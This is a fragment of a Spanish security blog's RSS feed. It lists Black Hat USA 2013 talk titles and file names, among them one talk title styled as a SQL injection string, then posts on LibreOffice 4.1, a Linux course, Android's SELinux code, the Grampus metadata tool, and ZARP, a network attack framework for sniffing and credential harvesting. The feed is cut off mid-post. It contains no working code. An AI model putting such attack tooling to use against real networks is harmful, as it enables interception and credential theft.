US-13-McNamee-How-To-Build-a-SpyPhone-WP.pdfUS-13-McNamee-How-To-Build-a-SpyPhone-Slides.pdfHow to Grow a TREE (Taint-enabled Reverse Engineering Environment) From CBASS (Cross-platform Binary Automated Symbolic-execution System) US-13-Li-How-to-Grow-a-TREE-Code.zipHunting the Shadows: In Depth Analysis of Escalated APT Attacks US-13-Yarochkin-In-Depth-Analysis-of-Escalated-APT-Attacks-WP.pdfUS-13-Yarochkin-In-Depth-Analysis-of-Escalated-APT-Attacks-Slides.pdfIs that a government in your network or are you just happy to see me? US-13-Fiterman-Is-that-a-Government-in-Your-Network-Slides.pdfJava Every-Days: Exploiting Software Running on 3 Billion Devices US-13-Gorenc-Java-Every-Days-Exploiting-Software-Running-on-3-Billion-Devices-WP.pdfUS-13-Gorenc-Java-Every-Days-Exploiting-Software-Running-on-3-Billion-Devices-Slides.pdfJavascript Static Security Analysis made easy with JSPrime US-13-Patnaik-Javascript-Static-Security-Analysis-made-Easy-with-JSPrime-WP.pdfUS-13-Patnaik-Javascript-Static-Security-Analysis-made-easy-with-JSPrime-Slides.pdfJust-In-Time Code Reuse: The more things change, the more they stay the same US-13-Snow-Just-In-Time-Code-Reuse-Slides.pdfLegal Aspects of Full Spectrum Computer Network (Active) Defense US-13-Clark-Legal-Aspects-of-Full-Spectrum-Computer-Network-Active-Defense-Slides.pdfMactans: Injecting Malware into iOS Devices via Malicious Chargers US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdfUS-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-Slides.pdfMainframes: The Past Will Come Back to Haunt You US-13-Young-Mainframes-The-Past-Will-Come-Back-to-Haunt-You-WP.pdfUS-13-Young-Mainframes-The-Past-Will-Come-Back-to-Haunt-You-Slides.pdfMaltego Tungsten as a collaborative attack platform US-13-Temmingh-Maltego-Tungsten-as-a-Collaborative-Attack-Platform-WP.pdfUS-13-Temmingh-Maltego-Tungsten-as-a-Collaborative-Attack-Platform-Slides.pdfMultiplexed Wired Attack Surfaces US-13-Ossmann-Multiplexed-Wired-Attack-Surfaces-WP.pdfOptiROP: hunting for ROP gadgets in style US-13-Quynh-OptiROP-Hunting-for-ROP-Gadgets-in-Style-WP.pdfOut of Control: Demonstrating SCADA device exploitation US-13-Forner-Out-of-Control-Demonstrating-SCADA-WP.pdfUS-13-Forner-Out-of-Control-Demonstrating-SCADA-Slides.pdfOwning the Routing Table – Part II US-13-Nakibly-Owning-the-Routing-Table-Part-II-WP.pdfUS-13-Nakibly-Owning-the-Routing-Table-Part-II-Slides.pdfPass-The-Hash 2: The Admin’s Revenge US-13-Duckwall-Pass-the-Hash-WP.pdfUS-13-Duckwall-Pass-the-Hash-Slides.pdfUS-13-Duckwall-Pass-The-Hash-2-The-Admins-Revenge-Code.zipPixel Perfect Timing Attacks with HTML5 US-13-Stone-Pixel-Perfect-Timing-Attacks-with-HTML5-WP.pdfPost Exploitation Operations with Cloud Synchronization Services US-13-Williams-Post-Exploitation-Operations-with-Cloud-Synchronization-Services-WP.pdfUS-13-Williams-Post-Exploitation-Operations-with-Cloud-Synchronization-Services-Slides.pdfPower Analysis Attacks for Cheapskates US-13-OFlynn-Power-Analysis-Attacks-for-Cheapskates-WP.pdfUS-13-OFlynn-Power-Analysis-Attacks-for-Cheapskates-Slides.pdfPredicting Susceptibility to Social Bots on Twitter US-13-Sumner-Predicting-Susceptibility-to-Social-Bots-on-Twitter-Slides.pdfPress ROOT to continue: Detecting OSX and Windows bootkits with RDFU US-13-Vuksan-Press-ROOT-to-Continue-Detecting-MacOS-and-Windows-Bootkits-with-RDFU-WP.pdfUS-13-Vuksan-Press-ROOT-to-Continue-Detecting-MacOS-and-Windows-Bootkits-with-RDFU-Slides.pdfRevealing Embedded Fingerprints: Deriving intelligence from USB stack interactions US-13-Davis-Deriving-Intelligence-From-USB-Stack-Interactions-Slides.pdfRFID Hacking: Live Free or RFID Hard US-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Slides.pdfUS-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Code.zipThe SCADA That Didn’t Cry Wolf- Who’s Really Attacking Your ICS Devices- Part Deux! US-13-Wilhoit-The-SCADA-That-Didnt-Cry-Wolf-Whos-Really-Attacking-Your-ICS-Devices-Slides.pdfSmashing The Font Scaler Engine in Windows Kernel US-13-Chan-Smashing-The-Font-Scaler-Engine-in-Windows-Kernel-WP.pdfUS-13-Chan-Smashing-The-Font-Scaler-Engine-in-Windows-Kernel-Slides.pdfSSL, gone in 30 seconds – a BREACH beyond CRIME US-13-Prado-SSL-Gone-in-30-seconds-A-BREACH-beyond-CRIME-WP.pdfUS-13-Prado-SSL-Gone-in-30-seconds-A-BREACH-beyond-CRIME-Slides.pdfTLS ‘secrets’ US-13-Daigniere-TLS-Secrets-WP.pdfUS-13-Daigniere-TLS-Secrets-Slides.pdfUART THOU MAD? US-13-Kohlenberg-UART-Thou-Mad-WP.pdfUS-13-Kohlenberg-UART-Thou-Mad-Slides.pdfUniversal DDoS Mitigation Bypass US-13-Lee-Universal-DDoS-Mitigation-Bypass-WP.pdfUS-13-Lee-Universal-DDoS-Mitigation-Bypass-Slides.pdfUS-13-Lee-Universal-DDoS-Mitigation-Bypass-Code.zipUSING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER US-13-Espinhara-Using-Online-Activity-As-Digital-Fingerprints-WP.pdfUS-13-Espinhara-Using-Online-Activity-As-Digital-Fingerprints-Slides.pdfVirtual Deobfuscator – a DARPA Cyber Fast Track funded effort US-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-WP.pdfUS-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-Slides.pdfUS-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-Code.zipWhat’s on the Wire? Physical Layer Tapping with Project Daisho US-13-Spill-Whats-on-the-Wire-WP.pdfUS-13-Spill-Whats-on-the-Wire-Slides.pdfWith BIGDATA comes BIG responsibility: Practical exploiting of MDX injections US-13-Chastuhin-With-BIGDATA-comes-BIG-responsibility-WP.pdfUS-13-Chastuhin-With-BIGDATA-comes-BIG-responsibility-Slides.pdf‘) UNION SELECT `This_Talk` AS (‘New Optimization and Obfuscation Techniques’) US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdfUS-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdfEmbedded Devices Security and Firmware Reverse Engineering US-13-Zaddach-Workshop-on-Embedded-Devices-Security-and-Firmware-Reverse-Engineering-WP.pdfUS-13-Zaddach-Workshop-on-Embedded-Devices-Security-and-Firmware-Reverse-Engineering-Slides.pdfJTAGulator: Assisted discovery of on-chip debug interfaces US-13-Grand-JTAGulator-Assisted-Discovery-of-On-Chip-Debug-Interfaces-Slides.pdfUS-13-Grand-JTAGulator-Assisted-Discovery-of-On-Chip-Debug-Interfaces-Code.zipMethodologies for Hacking Embedded Security Appliances US-13-Bathurst-Methodologies-for-Hacking-Embdded-Security-Appliances-Slides.pdfMo Malware Mo Problems – Cuckoo Sandbox to the rescue US-13-Bremer-Mo-Malware-Mo-Problems-Cuckoo-Sandbox-WP.pdfUS-13-Bremer-Mo-Malware-Mo-Problems-Cuckoo-Sandbox-Slides.pdfPDF Attack: A Journey from the Exploit Kit to the shellcode US-13-Esparza-PDF-Attack-A-journey-from-the-Exploit-Kit-Slides.pdfUS-13-Esparza-PDF-Attack-A-journey-from-the-Exploit-Kit-Slides-Source.zipPractical Pentesting of ERPs and Business Applications US-13-Polyakov-Practical-Pentesting-of-ERPs-and-Business-Applications-WP.pdfUS-13-Polyakov-Practical-Pentesting-of-ERPs-and-Business-Applications-Slides.pdfAbusing Web APIs Through Scripted Android Applications US-13-Peck-Abusing-Web-APIs-Through-Scripted-Android-Applications-WP.pdfUS-13-Peck-Abusing-Web-APIs-Through-Scripted-Android-Applications-Slides.pdfBeyond the Application: Cellular Privacy Regulation Space US-13-Dudley-Beyond-the-Application-Cellular-Privacy-Regulatory-Space-WP.pdfUS-13-Dudley-Beyond-the-Application-Cellular-Privacy-Regulatory-Space-Slides.pdfClickjacking Revisited: A Perceptual View of UI Security US-13-Akhawe-Clickjacking-Revisited-A-Perceptual-View-of-UI-Security-Slides.pdfCMX: IEEE Clean File Metadata Exchange US-13-Kennedy-CMX-IEEE-Clean-File-Metadata-Exchange-WP.pdfCrowdSource: An Open Source, Crowd Trained Machine Learning Model for Malware Capability Detection US-13-Saxe-CrowdSource-An-Open-Source-Crowd-Trained-Machine-Learning-Model-Slides.pdfDenial of Service as a Service – asymmetrical warfare at its finest US-13-Masse-Denial-of-Service-as-a-Service-Slides.pdfDenying service to DDOS protection services US-13-Nixon-Denying-Service-to-DDOS-Protection-Services-WP.pdfUS-13-Nixon-Denying-Service-to-DDOS-Protection-Services-Slides.pdfLTE BOOMS WITH VULNERABILITIES US-13-Gupta-LTE-Booms-withVulnerabilities-WP.pdfMalicious File for Exploiting Forensic Software US-13-Haruyama-Malicous-File-For-Exploiting-Forensic-Software-Slides.pdfMobile Malware: Why the traditional AV paradigm is doomed and how to use physics to detect undesirable routines US-13-Stewart-Mobile-Malware-Why-the-Traditional-AV-Paradigm-is-Doomed-WP.pdfUS-13-Stewart-Mobile-Malware-Why-the-Traditional-AV-Paradigm-is-Doomed-Slides.pdfNew Trends in FastFlux Networks US-13-Xu-New-Trends-in-FastFlux-Networks-WP.pdfUS-13-Xu-New-Trends-in-FastFlux-Networks-Slides.pdfOPSEC failures of spies US-13-Cole-OPSEC-Failures-of-Spies-Slides.pdfPassword Hashing: the Future is Now US-13-Aumasson-Password-Hashing-the-Future-is-Now-WP.pdfUS-13-Aumasson-Password-Hashing-the-Future-is-Now-Slides.pdfShattering Illusions in Lock-Free Worlds: Compiler/Hardware Behaviors in OSes and VMs us-13-Blanchou-Shattering-Illusions-in-Lock-Free-Worlds.pdfTOR… ALL-THE-THINGS! US-13-Geffner-Tor…-All-The-Things-WP.pdfUS-13-Geffner-Tor…-All-The-Things-Slides.pdfTruncating TLS Connections to Violate Beliefs in Web Applications US-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-WP.pdfUS-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-Slides.pdfThe Web IS Vulnerable: XSS Defense on the BattleFront US-13-Wroblewski-The-Web-IS-Vulnerable-XSS-Defense-on-the-Battle-Front-Slides.pdfUS-13-Wroblewski-The-Web-IS-Vulnerable-XSS-Defense-on-the-BattleFront-Code.zipFuente - Cyberhades</itunes:summary><itunes:keywords>Tutoriales</itunes:keywords></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-791739694556940645</guid><pubDate>Tue, 30 Jul 2013 13:09:00 +0000</pubDate><atom:updated>2013-07-30T08:39:22.201-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>LibreOffice 4.1 esta Disponible</title><description>&lt;div style="text-align: center;"&gt;&lt;img alt="http://es.libreoffice.org/assets/_resampled/resizedimage890667-LO4.1-Aviso-Aeropuerto.png" class="shrinkToFit decoded" height="300" src="http://es.libreoffice.org/assets/_resampled/resizedimage890667-LO4.1-Aviso-Aeropuerto.png" width="400" /&gt;&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="warning"&gt;Esta es la primera versión de la rama 4.1 de LibreOffice.&lt;/div&gt;&lt;div class="warning"&gt;&lt;br /&gt;&lt;b&gt;LibreOffice  4.1.0&lt;/b&gt; contiene muchas nuevas características interesantes, y es  adecuado para usuarios innovadores y avanzados - para las necesidades  extra conservadoras, recomendamos LibreOffice 4.0.4 o 3.6.7 de la serie  anterior.&lt;/div&gt;&lt;div class="warning"&gt;&lt;br /&gt;&lt;/div&gt;Las siguientes notas son aplicables:&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;i&gt;· Esta versión es idéntica &lt;span style="color: #333333; line-height: 27px;"&gt;bit a bit a la 4.1 Release Candidate 4, por lo que no es necesario descargar o reinstalar si ya tiene esa versión.&lt;/span&gt;&amp;nbsp;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;· En la  distribución para Windows puede escoger el idioma de la interfaz de  usuario que prefiera. El contenido de la ayuda está disponible mediante  un servicio online, o alternativamente como una instalación separada.&lt;span style="color: #333333; line-height: 27px;"&gt;&lt;/span&gt;&amp;nbsp;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;· Nuestros binarios para Windows están firmados digitalmente por The Document Foundation.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;· Para usuarios Windows que tengan  OpenOffice.org instalado, recomendamos desinstalarlo de antemano, porque  registra las mismas asociaciones de tipo de archivo.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;· Si usa Linux, la variante Java GCJ  tiene problemas conocidos con LibreOffice, recomendamos usar, por  ejemplo, OpenJDK en su lugar.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;· LibreOffice  4.x descarta unas pocas características en desuso, incluyendo soporte  para archivos binarios heredados de StarOffice, exportar a Word y Excel  legado (versión 6.0/95), y gestión heredada de documentos ODMA.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;· Algunas  entradas del menú han cambiado o fueron añadidas. Si le falta algo que  puede deberse a la utilización de los ajustes del menú personalizado de  su instalación de LibreOffice anterior.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;· Esta versión aún &lt;a href="https://wiki.documentfoundation.org/ReleaseNotes/4.1#Most_Annoying_Bugs" target="_blank"&gt;contiene algunos errores&lt;/a&gt;.  Los usuarios de Debian/Ubuntu deben asegurarse de haber desinstalado  completamente la versión de LibreOffice incluida en su distribución  antes de instalar 4.1.0.&lt;/i&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;b&gt;Descarga&lt;/b&gt;: &lt;a href="http://es.libreoffice.org/descarga/" target="_blank"&gt;Pagina Oficial - LibreOffice&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://kode-labs.blogspot.com/2013/07/libreoffice-41-esta-disponible.html</link><author>noreply@blogger.com (Kodeinfect)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-368729551844523548</guid><pubDate>Tue, 30 Jul 2013 13:03:00 +0000</pubDate><atom:updated>2013-07-30T08:33:47.333-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Tutoriales</category><title>Curso de Linux: Para novatos, brutos y extremadamente torpes</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-6dRW56fQJR4/Ufe40bXZIoI/AAAAAAAAA10/2-FM1HYD27w/s1600/url.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-6dRW56fQJR4/Ufe40bXZIoI/AAAAAAAAA10/2-FM1HYD27w/s400/url.jpg" width="266" /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;strong&gt;Parte (I): Iniciación al Sistema Operativo Linux.&lt;/strong&gt;&lt;br /&gt;&lt;i&gt;· A quién va dirigido este curso.&lt;br /&gt;· Introducción a Linux.&lt;br /&gt;· Algunos conceptos básicos.&lt;br /&gt;· El manual del sistema.&lt;br /&gt;· La shell.&lt;br /&gt;· Introducción a los procesos.&lt;br /&gt;· Más sobre procesos y señales.&lt;br /&gt;· Sistema de ficheros (Primera Parte).&lt;br /&gt;· Sistema de ficheros (Segunda Parte).&lt;br /&gt;· Sistema de ficheros (Tercera Parte).&lt;br /&gt;· Algunos comandos útiles.&lt;br /&gt;· Expresiones regulares.&lt;br /&gt;· El editor VI (Primera Parte).&lt;br /&gt;·El editor VI (Segunda Parte)&lt;/i&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;i&gt;· Programación Shell-Script (Primera Parte).&lt;br /&gt;· Programación Shell-Script (Segunda Parte).&lt;br /&gt;· Ejercicios resueltos de Shell-Script.&lt;/i&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;strong&gt;Parte (II): Usuario avanzado de Linux.&lt;/strong&gt;&lt;br /&gt;&lt;i&gt;· Introducción a la segunda parte del curso.&lt;br /&gt;· La memoria virtual en Linux.&lt;br /&gt;· La primera instalación de Linux.&lt;br /&gt;· Terminales.&lt;br /&gt;· Programación de tareas en el tiempo.&lt;br /&gt;· Introducción a Redes.&lt;br /&gt;· El arranque en Linux y cómo solucionar sus problemas (Primera Parte).&lt;br /&gt;· El arranque en Linux y cómo solucionar sus problemas (Segunda Parte).&lt;br /&gt;· Consejos generales para compilar Kernels.&lt;/i&gt;&lt;br /&gt;&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;strong&gt;Descarga:&lt;/strong&gt;&amp;nbsp; &lt;a class="bbc_link" href="https://mega.co.nz/#%21nMoDzDpb%21YnnFdQTt_52-o1i0drdEUS7KbHMfGrJUlVfLvHBTjHc" target="_blank"&gt;[MEGA]&lt;/a&gt; | &lt;a href="http://www.ciberdroide.com/Descarga_Gratis/download.php?file=libros-copyleft/E1/A1/Curso_Linux_ACastro.pdf" target="_blank"&gt;[CIBERDROIDE]&lt;/a&gt;&lt;/div&gt;</description><link>http://kode-labs.blogspot.com/2013/07/curso-de-linux-para-novatos-brutos-y.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/-6dRW56fQJR4/Ufe40bXZIoI/AAAAAAAAA10/2-FM1HYD27w/s72-c/url.jpg" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-6717563623430435865</guid><pubDate>Sat, 13 Jul 2013 00:55:00 +0000</pubDate><atom:updated>2013-07-12T20:26:27.800-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>Android incorpora codigo de la NSA desde 2011</title><description>&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-SdVli3fJurY/Ud-9GJaNeoI/AAAAAAAAOf4/vmofX61-7-I/s200/NSA_eagle.jpg" width="173" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;Sí amigos, el sistema operativo de código abierto de Google &lt;b&gt;incorpora código de la NSA desde 2011&lt;/b&gt;, si bien no se trata de un "backdoor" si no de algunas mejoras de seguridad para Android según &lt;a href="http://www.businessweek.com/articles/2013-07-03/security-enhanced-android-nsa-edition" target="_blank"&gt;Bloomberg&lt;/a&gt; para "&lt;i&gt;aislar  las aplicaciones para evitar que hackers y los comerciantes tengan  acceso a los datos personales o corporativos almacenados en un  dispositivo&lt;/i&gt;".&lt;br /&gt;&lt;br /&gt;El portavoz de Google Gina Scigliano confirmó  que Android ya está incorporando código de la NSA que ha estado  trabajando en una rama de su proyecto &lt;a href="http://es.wikipedia.org/wiki/SELinux" target="_blank"&gt;Linux SE (Security-Enhanced)&lt;/a&gt;, pero hizo hincapié en el hecho de que, "&lt;i&gt;todo el código de Android y de sus contribuyentes está a disposición del público para su consulta en source.android.com.&lt;/i&gt;"&lt;br /&gt;&lt;br /&gt;Sinceramente  no creo que la NSA se arriesgue a introducir código en el SO para el  espionaje... demasiadas miradas atentas y más aún después del escándalo  de PRISM. Sin embargo y como he leído en cierto &lt;a href="http://www.dailypaul.com/291945/the-nsa-has-inserted-its-code-into-android-os-or-three-quarters-of-all-smartphones" target="_blank"&gt;comentario&lt;/a&gt;,  el hardware de un smartphone carga en tiempo de ejecución muchas  librerías que no liberan el código a efectos prácticos y, por ejemplo,  este hardware se comunica con puntos de acceso y repetidores para  recepción y tono de llamadas. Estas tareas incluyen actualizaciones y  comandos como el pasivo "turn mic on". La suma de la interacción entre  el hardware de un dispositivo y la red telefónica es más interesante  para la NSA.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;Fuente - &lt;a href="http://www.hackplayers.com/2013/07/android-incorpora-codigo-de-la-nsa.html" target="_blank"&gt;Hackplayers &lt;/a&gt;&lt;/span&gt;&lt;/span&gt;</description><link>http://kode-labs.blogspot.com/2013/07/android-incorpora-codigo-de-la-nsa.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/-SdVli3fJurY/Ud-9GJaNeoI/AAAAAAAAOf4/vmofX61-7-I/s72-c/NSA_eagle.jpg" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-5714547567447554628</guid><pubDate>Fri, 12 Jul 2013 13:55:00 +0000</pubDate><atom:updated>2013-07-12T09:25:22.133-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Herramientas</category><title>La Orca Desembarca: Grampus Versión Beta - Disponible</title><description>&lt;div class="post"&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="" class="bbc_img" height="177" src="http://i.imgur.com/wO1973h.png" width="200" /&gt;&lt;/div&gt;&lt;br /&gt;Despues de mucho tiempo de espera, al menos por parte del equipo de desarrollo, &lt;b&gt;Grampus Beta&lt;/b&gt; sale a la luz. Para los que desconocen el proyecto, &lt;strong&gt;Grampus&lt;/strong&gt; es una herramienta &lt;i&gt;dirigida especialmente a analistas forenses y a pentesters en general&lt;/i&gt;.&lt;/div&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;br /&gt;&lt;i&gt;La  herramienta facilita la recopilación de información a traves de la  extracción de metadatos de diferentes documentos y tareas de finger/foot  printing&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="bbc_u"&gt;Características&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;b&gt;· Extracción de Metadatos:&lt;/b&gt;&lt;i&gt; Openoffice/Libreoffice, Office 2007, Office 2003, PDF, jpg, flv y gif.&lt;/i&gt;&lt;/div&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;/div&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;b&gt;· Eliminación de Metadatos:&lt;/b&gt; &lt;i&gt;Extraídos de diferentes documentos e imágenes.&lt;/i&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;b&gt;· Crawlers&lt;/b&gt;: &lt;i&gt;Posee tres tipos de  entre los que se encuentra un crawler de documentos (por extensión).&lt;/i&gt;&lt;/div&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;b&gt;· Fingerprinting:&lt;/b&gt; &lt;i&gt;Contamos con un server banner y un escaneo mediante Shodan usando su api&lt;/i&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="bbc_u"&gt;Objetivos&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;i&gt;Como  desarrolladores nuestro objetivo sería la implementación de nuevas  tareas para la recopilación de información y el mantenimiento de los  bugs que vayan saliendo.&lt;br /&gt;Fuera de eso, queremos incentivar el  desarrollo colectivo para que esta herramienta pueda ir  automanteniendose y autorenovandose gracias a la colaboración de  desarrolladores que usen la herramienta y así conseguir el objetivo  común de una herramienta multiplataforma, estable y eficiente.&lt;/i&gt;&lt;/div&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;/div&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;/div&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;span class="bbc_u"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="inner" id="msg_61636"&gt;&lt;b&gt;&lt;span class="bbc_u"&gt;Descarga&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;· Pagina de Bitbucket&lt;/b&gt;: &lt;i&gt;&lt;a class="bbc_link" href="https://bitbucket.org/grampusteam/" target="_blank"&gt;Grampus Team | Bitbucket&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;&lt;b&gt;· Descarga&lt;/b&gt;: &lt;i&gt;&lt;a class="bbc_link" href="https://bitbucket.org/grampusteam/grampus/downloads/Grampus%20Beta.zip" target="_blank"&gt;Descargar Grampus Versión Beta&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;· &lt;b&gt;User-Guide&lt;/b&gt;: &lt;i&gt;&lt;a class="bbc_link" href="https://www.mediafire.com/view/ocz5j3hxex6br41/userguide_grampus.pdf" target="_blank"&gt;Descargar - Guia de Usuario&lt;/a&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://kode-labs.blogspot.com/2013/07/la-orca-desembarca-grampus-version-beta.html</link><author>noreply@blogger.com (Kodeinfect)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-8761906994200517038</guid><pubDate>Wed, 10 Jul 2013 15:16:00 +0000</pubDate><atom:updated>2013-07-10T10:46:14.104-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Herramientas</category><title>ZARP: Network Attack Framework</title><description>&lt;div style="text-align: center;"&gt;&lt;i&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;b&gt;&lt;span class="hps"&gt;&lt;a href="http://1.bp.blogspot.com/-gK21LLP1Ueo/Ud16Ne33NJI/AAAAAAAAA1g/VApeMTrVotg/s1600/Sin+t%C3%ADtulo.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-gK21LLP1Ueo/Ud16Ne33NJI/AAAAAAAAA1g/VApeMTrVotg/s1600/Sin+t%C3%ADtulo.png" /&gt;&lt;/a&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;b&gt;&lt;span class="hps"&gt;Zarp&lt;/span&gt;&lt;/b&gt; &lt;span class="hps"&gt;es una herramienta de&lt;/span&gt; &lt;span class="hps"&gt;ataque a la red&lt;/span&gt; &lt;span class="hps"&gt;en torno a&lt;/span&gt; &lt;span class="hps"&gt;la explotación&lt;/span&gt; &lt;span class="hps"&gt;de las redes&lt;/span&gt; &lt;span class="hps"&gt;locales.&lt;/span&gt; &lt;span class="hps"&gt;Esto no incluye&lt;/span&gt; &lt;span class="hps"&gt;la explotación&lt;/span&gt; &lt;span class="hps"&gt;del sistema,&lt;/span&gt; &lt;span class="hps"&gt;sino&lt;/span&gt; &lt;span class="hps"&gt;que abusan de&lt;/span&gt; &lt;span class="hps"&gt;protocolos de red&lt;/span&gt; &lt;span class="hps"&gt;y pilas&lt;/span&gt; &lt;span class="hps"&gt;para hacerse cargo&lt;/span&gt;&lt;span&gt;,&lt;/span&gt; &lt;span class="hps"&gt;infiltrarse,&lt;/span&gt; &lt;span class="hps"&gt;y&lt;/span&gt; &lt;span class="hps"&gt;noquearlo.&lt;/span&gt; &lt;span class="hps"&gt;Las sesiones pueden&lt;/span&gt; &lt;span class="hps"&gt;ser administrados&lt;/span&gt; &lt;span class="hps"&gt;para envenenar&lt;/span&gt; &lt;span class="hps"&gt;y oler&lt;/span&gt; &lt;span class="hps"&gt;varios sistemas&lt;/span&gt; &lt;span class="hps"&gt;a la vez&lt;/span&gt;&lt;span&gt;, el vertido de&lt;/span&gt; &lt;span class="hps"&gt;la información sensible&lt;/span&gt; &lt;span class="hps"&gt;de forma automática o&lt;/span&gt; &lt;span class="hps"&gt;al atacante&lt;/span&gt; &lt;span class="hps"&gt;directamente&lt;/span&gt; &lt;span class="hps"&gt;rápidamente.&lt;/span&gt;&lt;span class="hps"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;Varios&lt;/span&gt; &lt;span class="hps"&gt;sniffers&lt;/span&gt; &lt;span class="hps"&gt;se incluyen para&lt;/span&gt; &lt;span class="hps"&gt;analizar&lt;/span&gt; &lt;span class="hps"&gt;automáticamente&lt;/span&gt; &lt;span class="hps"&gt;los nombres de usuario&lt;/span&gt; &lt;span class="hps"&gt;y contraseñas&lt;/span&gt; &lt;span class="hps"&gt;de diversos&lt;/span&gt; &lt;span class="hps"&gt;protocolos&lt;/span&gt;&lt;span class=""&gt;, así como&lt;/span&gt; &lt;b&gt;&lt;span class="hps"&gt;ver el tráfico&lt;/span&gt; &lt;span 